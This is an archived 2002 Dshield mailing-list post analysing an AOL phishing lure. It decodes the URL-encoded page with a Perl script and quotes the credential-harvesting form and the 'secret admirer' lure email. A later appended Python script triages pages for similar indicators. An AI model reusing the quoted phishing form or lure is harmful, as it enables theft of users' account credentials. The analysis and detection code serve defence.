[Dshield] OT?: some stuff, a firewall won't catch

Patrick Oonk patrick.oonk at pine.nl
Fri Nov 15 19:34:33 GMT 2002


On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske wrote:
> First:
> It's your own fault, if you really go to the site below and try to log in
> with your account/password -- you have been warned.

The page is 'encrypted' using URL encoding.

I used the following simple perl script (tnx to
http://tech-web.net/perl_memo.html)  to decode it.

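# Decode every input line and print it.
foreach (<>) {
  print URLd($_);
}

# URL-decode a string: '+' becomes a space, %XX becomes the byte 0xXX.
sub URLd {
  my $URLdecode = shift;
  $URLdecode =~ tr/+/ /;
  $URLdecode =~ s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
  return $URLdecode;
}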

$ perl ud < index.html |more 

The most noticeable part is the following:

<form action="http://64.143.44.63/cgi-local/crow.cgi"
method="POST"name="login">^M
^M
^M
<!-- This is the email where they go -->^M
^M
<input type="hidden" name="recipient"
value="JoshuaKneeland at email.com">^M
^M
<!-- This is the email where they go.. end. -->^M
^M
^M
^M
<input type="hidden"^M
    name="subject" value="gp says kristi is god"><input^M
    type="hidden" name="redirect"^M
    value="http://love.aol.com/LoveMain/"><input type="hidden"^M
    name="phish" value><table border="0" cellpadding="2"^M
    cellspacing="0" align="center">^M

Also notice the CR's to end lines and the fact that parts of
it are created with Frontpage: the signs of a true loser.

	Patrick

> 
> I found the email below in the inbox of my AOL account (yeap - still have
> that) this morning. I usually would have deleted it right away, but I was
> curious about what these spammers try now, to get your time and money. So --
> fire up lynx and go to the referenced page -- well -- after getting the
> source and making it readable, it revealed a nice piece of social
> engineering. The casual observer might really think that he logs in to
> AOL. And in doing so, his/her account/password gets posted to some web
> server in the process. I wonder how many AOL accounts got compromised ? ...
> 
> How do you catch that, except telling everybody over and over, not to click
> on links, to trust nobody and that the internet became a bad place to be?
> 
> 
> 
> 
> -----Original Message-----
> From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
> Sent: Thursday, November 14, 2002 7:08 PM
> To: undisclosed-recipients:
> Subject: You have an admirer!
> 
> 
> Someone has sent you a secret message. <A
> HREF=http://members.truepath.com/vegazisfun/>Click here to redeem your
> message now!</A>
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

-- 
 Patrick Oonk    -   Pine Digital Security    -   patrick.oonk at pine.nl
 T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
 PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
                  One thing less to worry about...
 Excuse of the day: Electricians made popcorn in the power supply
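
Added example, not part of the message above or of the list archive: a Python version of the same decode step that then reports where a login form posts and which hidden form-mailer fields it carries. The sample page, the 192.0.2.10 address and the example.com values are constructed; the field names checked (recipient, redirect) follow the form shown in the message.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlsplit

# Constructed sample: a percent-encoded login form (documentation-range IP).
SAMPLE = (
    "%3Cform+action%3D%22http%3A%2F%2F192.0.2.10%2Fcgi-local%2Fmail.cgi%22+method%3D%22POST%22%3E"
    "%3Cinput+type%3D%22hidden%22+name%3D%22recipient%22+value%3D%22drop%40example.com%22%3E"
    "%3Cinput+type%3D%22hidden%22+name%3D%22redirect%22+value%3D%22http%3A%2F%2Fexample.com%2F%22%3E"
    "%3Cinput+type%3D%22password%22+name%3D%22pw%22%3E%3C%2Fform%3E"
)

class FormAudit(HTMLParser):
    # Collects form actions, hidden inputs and whether a password field exists.
    def __init__(self):
        super().__init__()
        self.actions, self.hidden, self.has_password = [], {}, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input":
            kind = (a.get("type") or "text").lower()
            if kind == "hidden":
                self.hidden[a.get("name") or ""] = a.get("value") or ""
            elif kind == "password":
                self.has_password = True

def is_ip_host(url):
    # True when the URL's host is an IP literal rather than a name.
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def triage(encoded_page):
    # Same two steps as the Perl above: '+' -> space, then %XX -> byte.
    audit = FormAudit()
    audit.feed(unquote_plus(encoded_page, encoding="latin-1"))
    findings = []
    for action in audit.actions:
        if audit.has_password and is_ip_host(action):
            findings.append(f"password form posts to bare IP: {action}")
    for name in ("recipient", "redirect"):
        if name in audit.hidden:
            findings.append(f"hidden form-mailer field {name}={audit.hidden[name]}")
    return findings
```

Call triage() on the saved page text; an empty list means none of these three indicators were present, not that the page is safe.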



